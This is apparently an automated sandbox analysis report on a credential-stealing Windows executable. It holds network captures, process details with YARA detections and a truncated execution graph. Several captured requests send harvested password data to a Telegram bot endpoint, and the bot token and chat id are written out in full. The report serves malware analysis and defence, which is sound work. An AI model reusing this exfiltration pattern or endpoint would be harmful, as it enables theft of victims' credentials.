                                                                                                            2025-01-10 20:54:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 34 64 36 39 38 35 66 66 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd354d6985ff47Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:41 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:41 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44765,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542481,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.550058149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:42 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd358e0f65a80c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 38 65 30 66 36 35 61 38 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd358e0f65a80cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:43 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:43 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:43 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44766,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542483,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.550060149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:44 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd35cc02b4df6f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 63 63 30 32 62 34 64 66 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd35cc02b4df6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:44 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:44 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44767,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542484,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.550062149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:46 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd362136d2c0db
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 32 31 33 36 64 32 63 30 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd362136d2c0dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:46 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44768,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542486,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.550064149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:50 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd36827099b96e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 38 32 37 30 39 39 62 39 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd36827099b96eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:50 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:50 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44769,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542490,"document":{"file_name":"U


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:15:52:42
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\2CQ2zMn0hb.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'052'225 bytes
                                                                                                            MD5 hash:57A8326258E722638FDFAB7715E94356
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:15:53:15
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\2CQ2zMn0hb.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'052'225 bytes
                                                                                                            MD5 hash:57A8326258E722638FDFAB7715E94356
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.9%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:19.8%
                                                                                                              Total number of Nodes:1592
                                                                                                              Total number of Limit Nodes:39
                                                                                                              execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4185 401951 4178->4185 4179 405b39 4182 405c64 4179->4182 4271 4063e8 lstrcpynW 4179->4271 4181 405b5f 4183 405b72 4181->4183 4184 405b65 lstrcatW 4181->4184 4182->4185 4300 40672b FindFirstFileW 4182->4300 4272 405d09 lstrlenW 4183->4272 4186 405b78 4184->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4182 4197 405ab2 5 API calls 4200 405c94 4197->4200 4199 405c3c FindNextFileW 4201 405c52 FindClose 4199->4201 4199->4213 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4185 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4185 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4199 4211 405cac 4210->4211 4211->4185 4213->4199 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4228 406417 4215->4228 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4228 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4228 4225 406558 GetWindowsDirectoryW 4225->4228 4226 40667c 5 API calls 4226->4228 4227 4065d3 lstrcatW 4227->4228 4228->4216 4228->4219 4228->4220 4228->4223 4228->4225 4228->4226 4228->4227 4229 40658c SHGetSpecialFolderLocation 4228->4229 4230 40640a 10 API calls 4228->4230 4241 4062b6 4228->4241 4246 40632f wsprintfW 4228->4246 4247 4063e8 lstrcpynW 4228->4247 4229->4228 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4229->4231 4230->4228 4231->4228 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 4062ea RegQueryValueExW RegCloseKey 4245 40631a 4244->4245 4245->4228 4246->4228 4247->4228 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4181 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405adf 4280->4213 4281 405ad5 DeleteFileW 4283 405adb 4281->4283 4282 405acd RemoveDirectoryW 4282->4283 4283->4280 4284 405aeb SetFileAttributesW 4283->4284 4284->4280 4286 40546b 4285->4286 4287 40550d 4285->4287 4288 405487 lstrlenW 4286->4288 4289 40640a 17 API calls 4286->4289 4287->4213 4290 4054b0 4288->4290 4291 405495 lstrlenW 4288->4291 4289->4288 4293 4054c3 4290->4293 4294 4054b6 SetWindowTextW 4290->4294 4291->4287 4292 4054a7 lstrcatW 4291->4292 4292->4290 4293->4287 4295 4054c9 SendMessageW SendMessageW SendMessageW 4293->4295 4294->4293 4295->4287 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4185 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4197 4305->4304 4306->4259 4308 405d85 4307->4308 4310 405d97 4307->4310 4309 405d92 CharNextW 4308->4309 4308->4310 4312 405dbb 4309->4312 4311 405cea CharNextW 4310->4311 4310->4312 4311->4310 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4282 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4325 406082 4322->4325 4324 40640a 17 API calls 4323->4324 4326 4060cf 4324->4326 4325->4318 4325->4320 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4367 40165b 4365->4367 4370 40164a SetCurrentDirectoryW 4370->4367 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 